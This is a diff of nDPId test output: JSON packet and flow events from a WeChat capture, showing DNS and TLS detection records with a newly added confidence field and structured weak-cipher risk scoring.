 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"wechat.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1492167642989,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"ts_msec":1492167642989,"pkt":"MzMAAAD7eJKcD6iOht1gAAAAADARAf6AAAAAAAAAepKc\/\/4PqI7\/AgAAAAAAAAAAAAAAAAD7FOkU6QAwzvQAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1492167648243,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"ts_msec":1492167648243,"pkt":"8IQvSpdgeJKcD6iOCABFAAA7101AAEAR3q7AqAFnwKgB\/kphADUAJzTVMN0BAAABAAAAAAAAA3JlcwJ3eAJxcQNjb20AAAEAAQ=="}
-00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648243,"flow_last_seen":1492167648243,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1492167648243,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 01089{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1492167648277,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":537,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":537,"pkt_l4_len":503,"ts_msec":1492167648277,"pkt":"eJKcD6iO8IQvSpdgCABFoAILAABAAEARs4zAqAH+wKgBZwA1SmEB91rcMN2BgAABAA0AAgAMA3JlcwJ3eAJxcQNjb20AAAEAAcAMAAUAAQAADgoACwVyZXN3eAJ0Y8ATwCsABQABAAAALgANBXJlc3d4BHRjZG7AE8BCAAUAAQAAAC8ABgNzc2TAMcBbAAUAAQAAAhgABgNzc2TASMBtAAEAAQAAAIwABMvNniLAbQABAAEAAACMAATLzZfUwG0AAQABAAAAjAAEy82eNcBtAAEAAQAAAIwABMvNnjfAbQABAAEAAACMAATLzZfjwG0AAQABAAAAjAAEy82eI8BtAAEAAQAAAIwABMvNnjjAbQABAAEAAACMAATLzZfTwG0AAQABAAAAjAAEy82eNsBIAAIAAQAANa8ACgducy1jZG4xwBPASAACAAEAADWvAAoHbnMtY2RuMsATwQ8AAQABAAACoQAEtv4QccEPAAEAAQAAAqEABLhpznrBDwABAAEAAAKhAAQOEROMwQ8AAQABAAACoQAEZwce7sEPAAEAAQAAAqEABHt+dlDBDwABAAEAAAKhAAS0oxYuwSUAAQABAAACoQAEtv4LcsElAAEAAQAAAqEABLb+bmTBJQABAAEAAAKhAATLzZfxwSUAAQABAAACoQAEDhEsW8ElAAEAAQAAAqEABHBaSWTBJQABAAEAAAKhAAR9Jy3o"}
-00746{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}}
+00772{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":938,"source":"wechat.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167648243,"flow_last_seen":1492167648277,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":526,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":19041,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.QQ","breed":"Fun","category":"Chat"},"dns": {"query":"res.wx.qq.com","num_queries":1,"num_answers":27,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.158.34"}}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648277,"flow_last_seen":1492167648277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167648277,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1492167648277,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167648277,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8euFAAEAGk9vAqAFny82eIqtKAbscYaCqAAAAAKACchBlYgAAAgQFtAQCCAoAMdpLAAAAAAEDAwc="}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167648494,"flow_last_seen":1492167648494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167648494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43851,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1492167648494,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167648494,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/\/9AAEAGDr3AqAFny82eIqtLAbsShiV+AAAAAKACchDqMgAAAgQFtAQCCAoAMdqBAAAAAAEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1492167648582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167648582,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0qHWOtEHGGgq4ASOQgtSgAAAgQFtAEBBAIBAwMH"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1492167648582,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1492167648582,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoeuJAAEAGk+7AqAFny82eIqtKAbscYaCrh1jrRVAQAOWmPwAA"}
-00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00831{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":943,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167648277,"flow_last_seen":1492167648583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1492167648583,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1492167648873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167648873,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0AABAADEGHSXLzZ4iwKgBZwG7q0tO\/rLJEoYlf4ASOQgjJgAAAgQFtAEBBAIBAwMH"}
 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"wechat.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1492167648873,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1492167648873,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoAABAAEAGDtHAqAFny82eIqtLAbsShiV\/Tv6yylAQAOWcGwAA"}
-00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}}
-01456{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}}
+00999{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":968,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167648277,"flow_last_seen":1492167648902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"ts_msec":1492167648902,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1"}}
+01563{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":970,"source":"wechat.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167648277,"flow_last_seen":1492167648903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3430,"flow_tot_l4_payload_len":5407,"flow_avg_l4_payload_len":675,"midstream":0,"ts_msec":1492167648903,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.158.34","src_port":43850,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.QQ","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"res.wx.qq.com","server_names":"wx1.qq.com,webpush.wx.qq.com,webpush1.weixin.qq.com,loginpoll.weixin.qq.com,login.wx.qq.com,file.wx2.qq.com,wx2.qq.com,login.wx2.qq.com,wxitil.qq.com,file.wx.qq.com,login.weixin.qq.com,webpush2.weixin.qq.com,webpush.wx2.qq.com,webpush.weixin.qq.com,web.weixin.qq.com,res.wx.qq.com,wx.qq.com","ja3":"550dce18de1bb143e69d6dd9413b8355","ja3s":"290adf098a54ade688d1df074dbecbf2","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=CN, ST=Guangdong, L=Shenzhen, O=Shenzhen Tencent Computer Systems Company Limited, OU=R&D, CN=wx.qq.com","alpn":"h2,http\/1.1","fingerprint":"67:53:57:7F:22:BB:D0:A6:D4:5F:A6:D4:B3:0A:13:73:29:23:D0:C9"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1492167650311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1492167650311,"pkt":"8IQvSpdgeJKcD6iOCABFAAA916xAAEAR3k3AqAFnwKgB\/uySADUAKTCBKzkBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"}
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650311,"flow_last_seen":1492167650311,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492167650311,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1492167650345,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":1492167650345,"pkt":"eJKcD6iO8IQvSpdgCABFoADcAABAAEARtLvAqAH+wKgBZwA17JIAyGqeKzmBgAABAAEABAAEA3NzbAdnc3RhdGljA2NvbQAAAQABwAwAAQABAAAAHQAErNkXQ8AQAAIAAQACif4ADQNuczEGZ29vZ2xlwBjAEAACAAEAAon+AAYDbnM0wEHAEAACAAEAAon+AAYDbnMywEHAEAACAAEAAon+AAYDbnMzwEHAPQABAAEABTcbAATY7yAKwGgAAQABAAUtSQAE2O8iCsB6AAEAAQAFLUkABNjvJArAVgABAAEABS1JAATY7yYK"}
-00756{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167650345,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}}
+00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":998,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167650345,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.23.67"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167650348,"flow_last_seen":1492167650348,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1492167650348,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02239{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1492167650348,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1492167650348,"pkt":"8IQvSpdgeJKcD6iOCABFAAVibiVAAEARQTrAqAFnrNkXQ4sRAbsFTiZlDSoBZwIONIO7UTAzNQGbgwNlLywtCSgLtCegAQAEQ0hMTx0AAABQQUQAIgEAAFNOSQAxAQAAU1RLAGsBAABWRVIAbwEAAENDUwB\/AQAATk9OQ58BAABNU1BDowEAAEFFQUSnAQAAVUFJRMgBAABTQ0lE2AEAAFRDSUTcAQAAUERNROABAABTUkJG5AEAAFNNSEzoAQAASUNTTOwBAABDVElN9AEAAE5PTlAUAgAAUFVCUzQCAABNSURTOAIAAFNDTFM8AgAAS0VYU0ACAABYTENUSAIAAENTQ1RIAgAAQ09QVEgCAABDQ1JUYAIAAElSVFRkAgAAQ0VUVggDAABDRkNXDAMAAFNGQ1cQAwAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zc2wuZ3N0YXRpYy5jb227JKt8ARxJVGRWJtplczZ+Y0Ub6N9qmKgMLrSZKyo986eVN4hLCQ8XNjFEbipb4AqXbG2doRLcUxXPUTAzNQHogWCSkhrofu2AhqIVgpFY8KviMDAwMDAwMDA5UDTgFLbVCW\/cQ8zfwllNkC+Y3GQAAABDQzIwQ2hyb21lLzU3LjAuMjk4Ny4xMzMgTGludXggeDg2XzY0Jc6XFWD7G7yXYXhVaoxdywAAAABYNTA5AAAQAAEAAAAeAAAA4qvwWAAAAABQ8MfjcV\/rNPz9nE7SSiHC6cDht5RKlsv0JChHgsKm0olGM4pgTHU2HYUvFhtNkOqQx\/75FAQP87Et+xOmGXIhZAAAAAEAAABDMjU1wgnkHLidnM3CCeQcuJ2czT2t9HxBefiRQAt7kKmuees8hQEA9eDJxrTnigGUXAfpWeAkSroNTkBs4scsx1Ra2LSNreNDFvpSDuqq6UeKpHg6NTM40g2RnXl5QzirTperKCTKzWwn+4\/bmuO2uGlriSPr4ExcTigYtlruN8fxdgnsCAuRhi2\/JFjFnbJqpKvDwpzJerd7H8C9zsxPzgMehsK4\/vItkCcZuwJmgaicPHLBf9M3RGKygCyV25zBdoSYTv7XUf5XBhgAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
